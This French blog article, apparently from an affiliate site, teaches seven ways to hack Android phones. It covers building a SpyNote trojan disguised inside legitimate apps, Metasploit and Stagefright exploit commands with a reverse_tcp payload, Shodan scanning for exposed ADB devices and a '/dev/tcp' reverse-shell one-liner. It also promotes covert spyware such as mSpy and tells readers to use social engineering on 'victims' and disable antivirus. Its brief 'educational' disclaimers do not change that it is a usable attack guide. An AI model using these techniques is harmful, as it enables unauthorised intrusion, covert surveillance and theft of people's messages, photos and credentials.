Voulez-vous savoir comment les hackers piratent les téléphones Android ?
Êtes-vous fatigué de voir tous ces faux sites d’escroquerie et ces vidéos youtube bidons ?
Alors félicitations, vous êtes au bon endroit.
Aujourd’hui, nous allons vous apprendre non pas une ou deux façons, mais un total de 7 techniques pour pirater un téléphone Android comme par exemple :
➽ Sommaire
Utilisation de Spynote
METASPLOIT ET MSFVENOM
Applications de contrôle à distance : AirDroid & Team viewer
Applications d’espionnage
Keyloggers
Kikde iOWL
Shadow- Enregistreur de frappe pour enfants
Exploit Stagefright
ADB (Android Debug Bridge)
Le piratage des téléphones Android
Pirater un téléphone Android en utilisant metasploit et msfvenom
➽ Qu’est-ce que le piratage d’Android ?
Le piratage d’Android se fait de l’une des manières suivantes :
Installer un malware ou un trojan dans le téléphone de la victime.
Le contrôler à distance via votre appareil.
Créer un terminal shell avec accès administrateur dans le téléphone de la victime en utilisant un exploit.
Les hacks suivants varient dans leur mise en œuvre mais les idées de base restent les mêmes. Si vous avez des questions, posez-les dans la section des commentaires.
1) Utiliser Spynote
Spynote est un outil d’administration à distance (RAT) qui vous permet de pirater n’importe quel appareil Android et de créer des chevaux de Troie et des enregistreurs de frappe personnalisés.
Vous pouvez également créer des chevaux de Troie et des virus à partir de fichiers apk existants.
Vous pouvez télécharger n’importe quel apk sur internet et cacher votre virus à l’intérieur de l’apk.
C’est pourquoi cet outil d’administration à distance est l’un des meilleurs outils de piratage pour pirater un Android.
Avec cette application, vous pouvez accéder :
à l’appareil photo de la victime
aux fichiers journaux d’appels & messages
aux messages WhatsApp et bien plus encore en utilisant uniquement l’application Spynote
Étape 2 : Téléchargez et extrayez l’outil Spynote RAT. Le mot de passe du fichier RAR que vous téléchargez est SpyNote.
Étape 3 : Ouvrez maintenant l’application Spynote. La version que j’utilise est la version 6.4. Si votre version est différente, alors le tableau de bord peut différer légèrement, mais les fonctions sont les mêmes.
Étape 4 : Maintenant, mettez toutes les informations requises comme le port. Puis enregistrez les paramètres.
Etape 5 : Cliquez maintenant sur l’option payload. Cela ouvrira le tableau de bord de Spynote.
Étape 6 : Ajoutez tous les détails requis tels que le nom du client, le nom de l’application, le service et le nom de la version. Vous pouvez également définir des options avancées comme un enregistreur de frappe, le masquage de l’icône de l’application, le mode super utilisateur et l’application d’administration.
REMARQUE : Vous pouvez également utiliser d’autres fichiers apk et cacher votre cheval de Troie dans d’autres fichiers. Par exemple, prenez le fichier apk Instagram et ajoutez-y votre cheval de Troie.
Étape 7 : Ajoutez toutes les informations du réseau comme le port et votre adresse IP.
Étape 8 : Une fois que vous avez terminé. Cliquez sur le bouton de construction.
Étape 9 : Vous verrez l’écran suivant où l’outil est compilé et enregistré.
Étape 10 : Maintenant, l’apk sera créé dans le dossier de sortie de Spynote.
Le chemin de sortie doit être C:\Building-6.1\apktool\out
Étape 12 : Maintenant, vous devez utiliser l’ingénierie sociale pour que la victime installe l’APK sur son appareil. Cette partie est quelque chose que vous devez faire vous-même. C’est à vous de faire preuve de créativité.
Étape 13 : Vous avez réussi à pirater le téléphone de la victime dès qu’elle l’a installé et ouvert.
Étape 14 : Un clic droit sur l’utilisateur apparaissant dans Spynote vous donnera la liste des actions que vous pouvez effectuer.
Étape 15 : Vous pouvez maintenant accéder à son appareil photo, aux fichiers, aux journaux d’appels, aux messages et même aux messages en utilisant l’application Spynote.
Vous avez maintenant appris comment les hackers piratent les téléphones Android en utilisant l’outil Spynote Rat.
Maintenant, que pouvons-nous faire pour que le piratage soit global et que nous puissions pirater n’importe qui sur internet ?
Étape 1 : Nous avons besoin d’un routeur qui peut transférer des ports. C’est une nécessité pour le piratage sur internet.
Étape 3 : Ensuite, nous avons besoin d’une IP dynamique pour que Spynote fonctionne sur internet, donc allez sur noip.com et inscrivez-vous. Après s’être inscrit, cliquez sur Add Host et entrez un nom quelconque pour l’hôte. Cliquez sur enregistrer l’hôte.
Étape 4 : Téléchargez maintenant DUC depuis le site officiel. Installez le client DUC et connectez-vous à votre compte. Une fois que vous l’aurez fait, l’adresse IP de votre système sera automatiquement mise à jour dans le DNS. Au cas où cela ne se produirait pas, vous pouvez configurer manuellement le DNS.
Étape 5 : Cliquez sur ajouter des hôtes sur le client DUC. Si cela est fait correctement, vous obtiendrez les trois coches vertes.
Étape 6 : Maintenant, nous avons besoin de l’IP de la passerelle pour transférer le port à partir des paramètres de notre routeur. Tapez donc « ipconfig » dans l’invite de commande, et vous obtiendrez l’IP de la passerelle.
Étape 7 : Maintenant, ouvrez n’importe quel navigateur que vous avez et collez l’IP de la passerelle. La page de connexion s’affichera. Entrez le nom d’utilisateur et le mot de passe de votre routeur (par défaut, les deux sont admin pour la plupart des routeurs).
Étape 8 : Naviguez maintenant vers l’option de transfert de port. Selon la marque du routeur, la page peut se trouver à un autre endroit, mais le principe sous-jacent est le même.
Étape 9 : Cliquez sur Ajouter un port et ajoutez le port 2222. Vous pouvez mettre n’importe quel numéro de port que vous souhaitez.
Étape 10 : Ouvrez le spynote.exe, il vous demandera le numéro du port. Entrez 2222 comme numéro de port, puis enregistrez. Cela devrait mettre à jour correctement les paramètres du routeur.
Étape 11 : Ajoutez tous les détails requis tels que le nom du client, le nom de l’application, le service et le nom de la version. Vous devez définir le même nom d’hôte que celui que vous avez défini dans le client NOIP dans les paramètres DNS.
Étape 12 : Une fois que vous avez terminé. Cliquez sur le bouton « build ».
Étape 13 : Vous verrez l’écran suivant où l’outil est compilé et sauvegardé.
Étape 14 : Maintenant, l’apk sera créé dans le dossier de sortie de spynote. Le chemin de sortie doit être C:\Building-6.1\apktool\out
Étape 15 : Maintenant, vous devez utiliser l’ingénierie sociale pour que la victime installe l’APK sur son appareil. Cette partie est quelque chose que vous devez faire vous-même. C’est à vous de faire preuve de créativité.
Étape 16 : Vous avez réussi à pirater le téléphone de la victime dès qu’elle l’a installé et ouvert.
Questions fréquemment posées sur Spynote
Q.1 Cet outil de piratage spynote est-il légal ?
Non. Il n’est pas destiné à pirater les gens. Il s’agit d’un outil destiné uniquement au tests de pénétration White Hat et doit être utilisé avec la même intention. Untelephone.com n’est pas responsable de l’utilisation illégale que vous en faites.
Q.2 Cela ne fonctionne pas, que dois-je faire ?
Désactivez le pare-feu et l’antivirus, puis recommencez toutes les étapes.
Assurez-vous que vous ne faites pas de fautes de frappe.
Q.3 Mon antivirus le détecte comme un virus, est-ce sûr ?
Oui, il est sûr uniquement si vous l’avez téléchargé depuis le site officiel.
La raison pour laquelle l’antivirus le détecte est qu’il s’agit d’un outil de piratage et qu’en tant que tel, il contient des codes utilisés pour créer des virus.
Q.4 Je veux pirater le téléphone de ma petite-amie, comment dois-je faire ?
Nous ne soutenons pas le piratage Black Hat, et nous ne répondons pas à de telles demandes. Cet article est uniquement destiné à des fins éducatives.
2) METASPLOIT ET MSFVENOM
Lorsqu’il s’agit de pirater des téléphones Android, il n’y a pas de meilleur outil que Metasploit et msfvenom. Ces outils sont essentiellement des frameworks pour le piratage des appareils Android.
Pour effectuer ce piratage en utilisant Metasploit ou msfvenom, vous aurez besoin de :
Avec l’aide des commandes suivantes, vous pouvez pirater les fichiers de messages de la victime ainsi que les caméras Android.
– record_mic
– webcam_snap
– webcam_stream
– dump_contacts
– dump_sms
– geolocate
3) Applications de contrôle à distance
Il existe de nombreuses applications disponibles sur internet qui vous permettent de contrôler votre appareil Android à distance.
En utilisant ces applications, vous pouvez facilement pirater vos appareils Android.
Étape 2. Utilisez l’ingénierie sociale pour accéder au téléphone de la victime, installez l’application Airdoid et entrez votre code de connexion pour configurer l’application et l’interface Airdoid.
Étape 3. Allez sur le tableau de bord Airdroid, vous aurez les détails du téléphone que vous avez piraté.
Étape 2. Utilisez l’ingénierie sociale et obtenez l’accès au téléphone de la victime, installez-y l’application TeamViewer et entrez votre identifiant pour configurer l’application.
Étape 3. Allez sur le tableau de bord Teamviewer, vous y trouverez les détails du téléphone que vous avez piraté.
4) Applications d’espionnage
Les applications d’espionnage sont des fichiers apk malveillants qui, une fois installés sur l’appareil Android de la victime, compromettent le système et permettent au pirate d’accéder à l’appareil à distance.
Il existe de nombreuses entreprises qui fabriquent ces types de logiciels de suivi et de surveillance qui sont essentiellement des applications d’espionnage.
Nous avons examiné l’outil d’espionnage appelé Hoverwatch qui a un essai gratuit. Vous pouvez lire notre article ici : Notre avis sur Hoverwatch.
Les keyloggers sont des logiciels qui enregistrent tout ce qui est tapé sur le clavier (toutes vos frappes).
En utilisant ce logiciel, nous pouvons facilement avoir accès à n’importe quel compte tant que la victime se connecte à son compte lorsque le keylogger est actif.
Quelques exemples de keyloggers sont présentés ci-dessous :
Kikde iOWL
Kikde iOWL analyse secrètement les données sur les téléphones sans avoir à pirater un téléphone Android.
Il analyse les données de vos proches
de vos enfants
ou des membres de votre personnel
espionne les SMS, les MMS,
Whatsapp, Facebook, Viber,
l’activité internet,
le calendrier, les contacts,
et beaucoup de frappes de clavier.
➽ Les caractéristiques de l’application d’espionnage Kikde iOWL
La surveillance parentale
la surveillance des employés
l’espionnage en temps réel
l’assistance client 24/7
➽ Mode d’emploi de Kikde iOWL
Étape 1 : Télécharger et installer l’application
Étape 2 : Activez et mettez le keylogger en statut actif
Étape 1 : Téléchargez et installez l’application depuis le Play Store.
Étape 2 : Activez et réglez le keylogger sur le statut actif.
➽ Démonstration de Shadow Kid pour hacker un Android
mSpy
Mspy est le Keylogger n°1, tout simplement parce qu’il est compatible à la fois avec les Android et les iPhone.
Sur iPhone, il peut même s’installer à distance à l’aide des identifiants iCloud de la victime.
Autoriser MSpy sur un Samsung (Android)
Cette application mobile s’installe discrètement sur le téléphone de votre choix, avant de rappatrier pour vous ses données.
En plus de la récupération des mots de passe, il enregistre pour vous les localisations, les discussions sur les réseaux sociaux et les photos/vidéos.
Il s’agit d’une vulnérabilité majeure d’Android dans les anciens appareils qui peut être utilisée pour pirater les téléphones Android.
Cette vulnérabilité existe dans les versions 2.1 à 5.1.1 (lollipop).
Comment un pirate peut-il utiliser cet exploit Stagefright ?
Cette vulnérabilité critique Stagefright dans Android a été découverte par un chercheur en cybersécurité de Zimperium.
Cette vulnérabilité Stagefright est un type d’attaque par débordement de tampon. Cet exploit à distance ne nécessite aucune autre interaction humaine.
Le pirate envoie un lien vers un fichier malveillant
Lorsqu’il est cliqué, ce fichier fait planter la bibliothèque Stagefright
Le processus redémarre alors avec un reverse shell vers le serveur comprenant la machine avec l’exploit Stagefright
Et voilà, l’appareil Android est piraté sans que l’utilisateur s’en rende compte
Piratage d’Android avec l’exploit Stagefright et Kali Linux
Étape 1
Démarrer votre Kali Linux.
Étape 2
Configurer le serveur Metasploit pour utiliser l’exploit Stagefright.
Pour configurer Metasploit, tapez les commandes suivantes dans la console msf :
use exploit/android/browser/stagefright_mp4_tx3g_64bit
set SRVHOST 192.168.182.136 (your IP here)
set URIPATH /
set payload linux/armle/meterpreter/reverse_tcp
set lhost 192.168.182.136 (your IP here)
set verbose true
exploit -j
Étape 3
Exploiter la victime ayant la vulnérabilité stagefright
Maintenant que l’exploit est lancé, envoyez le lien malveillant à la victime.
Dans mon cas, le lien est : http://189.137.172.148:8080/
➽ Notes :
Cette attaque ne fonctionne que sur des téléphones Android limités avec des navigateurs stock périmés.
Notez que cet exploit n’est pas très stable et que la connexion peut ne pas persister.
➽ Une autre méthode consiste à tout faire manuellement et à lancer l’attaque comme indiqué ci-dessous
Syntax: “python ‘address of script’ -c your local ip -p any open port -o filename of the video.”
eg: python ‘/root/Desktop/mp4.py’ -c 192.168.1.8 -p 4364 -o hello
Étape 4
Envoyez ce fichier à la victime en utilisant vos compétences en ingénierie sociale.
Étape 5
Après que la victime ait été piégée par l’attaque, lister le port du site en utilisant la commande “netcat -l -p port which used while creating your attack video”.
7) Utiliser ADB (Android Debug Bridge)
Adb est l’abréviation d’Android Debug Bridge.
Il s’agit essentiellement d’un logiciel de développement pour tester et développer Android.
Mais en raison des nombreuses failles de sécurité et des configurations faibles, il est très facile de pirater un appareil Android avec AdB en cours d’exécution.
Prérequis
Internet
Le serveur de débogage Android doit être activé
Adb installé sur le système.
Installation d’Adb sur le système
Adb est un outil open-source qui peut être installé sur n’importe quelle distribution Windows ou Linux.
Pour Linux, tapez la commande suivante :
Pour trouver les appareils vulnérables qui utilisent le service adb daemon, visitez shodan.io.
Shodan est un moteur de recherche qui indexe tous les appareils vivants sur internet.
Effectuez une recherche avec le mot-clé android debug bridge. Vous obtiendrez une liste de milliers d’appareils Android piratables utilisant des services adb vulnérables.
Vous pouvez pirater n’importe lequel d’entre eux à des fins de test.
Exploitation des appareils vulnérables
Dans l’étape 1, nous avons déjà installé adb. Maintenant nous devons exploiter les appareils avec le service adb vulnérable.
Après avoir installé adb, tapez la commande suivante :
connect <remote_ip>
L’IP distante est l’adresse de la victime que vous avez trouvé sur Shodan.
Une fois la connexion réussie, vous serez en mesure d’obtenir un shell sur l’appareil Android en utilisant la commande
Pour commencer ce hack, nous avons besoin d’un PC avec adb installé.
Si vous avez essayé la méthode précédente, c’est déjà fait. Cette méthode est une variante de la stratégie d’attaque originale du port 5555, il s’agit de la même chose mais elle le fait sur le port 6699 à la place.
Démarrez votre terminal Kali Linux.
Tapez la commande suivante : netcat with nc -lvp 6699
Exécutez le script ou les commandes sur le système de la victime.
Obtenez les lignes de code suivantes sous forme de fichier script dans le téléphone de la victime, soit par le biais de la carte SD, soit par votre site Web, ou injectez ce qui suit dans les appareils Android en utilisant l’un des autres hacks.
Exploitez et exécutez les commandes suivantes sur l’appareil Android de la victime
adb connect {replace_with_victim_ip}:6699
adb shell sh -i >& /dev/tcp/{replace_with_your_ip}/6699 0>&1
Avec ceci, vous obtiendrez un shell Android pour exploiter le téléphone.
C’est tout. Vous devriez maintenant obtenir un reverse shell sur n’importe quel appareil Android lorsque la victime invoque les lignes de code ci-dessus sur le même réseau.
Comment Hacker Instagram
Avec ADB, vous n’aurez jamais besoin de la permission d’exécution sur les appareils non rootés puisque vous êtes déjà un administrateur dans adb.
C’est pourquoi ce hack est puissant et étonnant car vous n’avez besoin d’aucune connaissance technique pour cela.
Même un homme des cavernes pourrait utiliser ce hack pour pirater les téléphones Android en utilisant adb.
Note des auteurs : Les commentaires contraires à l’éthique et offensant comme « Mon copain me trompe aidez-moi à pirater son téléphone », « Je veux hacker les images Whatsapp de ma copine », ne sont pas légaux et nous n’accepterons pas de tels commentaires ni demandes.
Untelephone.com est un blog professionnel sur les logiciels de récupération, de sauvegarde, de gestion et de transfert de données pour téléphones Android et iOS.
Nous sommes jeunes mais notre équipe est décidée à fournir aux utilisateurs de téléphones Android et iOS les meilleures applications pour les aider à résoudre toutes sortes de problèmes d’espionnage, de perte de données, de transfert et de sauvegarde de fichiers.
Notre but est d’améliorer la vie numérique de nos clients pour qu’ils s’épanouissent dans leur vie quotidienne.
Grâce à nos deux produits d’affiliation, nous sommes assistés par des équipes de développement de logiciels, d’assistance technique, de marketing, de conception d’applications et de sites web.
Nos membres sont responsables et entreprenants. Nous travaillons dur dans le but d’exporter à l’international les programmes les plus professionnels dotés du meilleur support technique possible.